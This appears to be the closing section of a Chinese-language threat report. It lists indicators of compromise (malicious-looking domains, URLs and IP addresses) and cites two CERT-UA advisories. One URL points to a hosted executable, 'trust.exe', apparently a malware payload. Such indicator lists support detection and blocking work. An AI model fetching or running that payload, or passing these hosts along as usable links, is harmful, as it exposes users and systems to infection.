maximprofile.net
alegoomaster.com
infomalilopera.ru
homospoison.ru
coudzoom.ru
6.2 URL
http://americanocoffea.ru/
http://polinamailserverip.ru/
http://jskgdhjkdfhjdkjhd844.ru/antirecord/trust.exe
http://maximprofile.net/
http://infomalilopera.ru/
http://jskgdhjkdfhjdkjhd844.ru/
http://azartnyjboy.com/
http://hopentools.site/
http://alegoomaster.com/
http://freesitucionap.com/
6.3 IP
176.124.193.111
195.123.219.57
193.106.175.177
77.232.37.148
參考鏈接:
[1] https://cert.gov.ua/article/4555802
[2] https://cert.gov.ua/article/4755642
關(guān)鍵詞:

營業(yè)執(zhí)照公示信息